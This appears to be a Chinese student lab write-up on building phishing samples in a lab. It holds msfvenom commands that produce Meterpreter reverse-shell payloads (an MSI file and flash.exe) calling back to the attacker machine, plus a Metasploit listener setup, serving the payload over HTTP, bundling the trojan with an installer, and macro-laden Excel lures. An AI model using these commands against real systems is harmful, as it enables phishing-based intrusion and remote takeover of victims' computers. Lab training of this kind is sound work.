渗透·实验五

一、实验目的

学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理.

二、实验任务

1.制作恶意的excel文件

2.将正常的软件和恶意木马进行捆绑打包

三、实验环境

1、靶机地址:192.168.85.130

2、攻击机地址:192.168.85.128

四、实验过程和实验结果

msf生成恶意的msi文件

msfvenom -p windows/meterpreter/reverse_tcp lhsot=192.168.85.128 lport=10493 -f msi -o diaoyexl.msi

然后msf建立监听

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.85.128

set lport 10493

启动 msf 监听

然后python在具有恶意的msi的文件夹下开启http服务,启动msi传输

python3 -m http.server 80

当目标访问excel且启用宏功能时,如下获取shell

制作msf木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=192.168.85.128 lport=10493 -f exe -o flash.exe

按照要求把木马flash.exe和正常的安装包进行压缩,制作好捆绑木马

在win7虚拟机中运行,可以在任务管理器中看到,flash.exe被执行

在kali中建立监听,成功连接

五、实验总结

本次实验,我们学习了社会工程学钓鱼样本的制作,学习到了制作钓鱼文件并通过kali连接钓鱼文件获取权限。在Windows系统中,我们通过制作宏定义多重表,宏表内部添加恶意代码,我们将该excel宏表隐藏为正常的表传递给靶机,接着连接恶意代码后门,成功获取权限。另一种是创建压缩包,解压压缩包会执行我们的恶意文件,我们通过文件也能够获取到恶意文件。

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值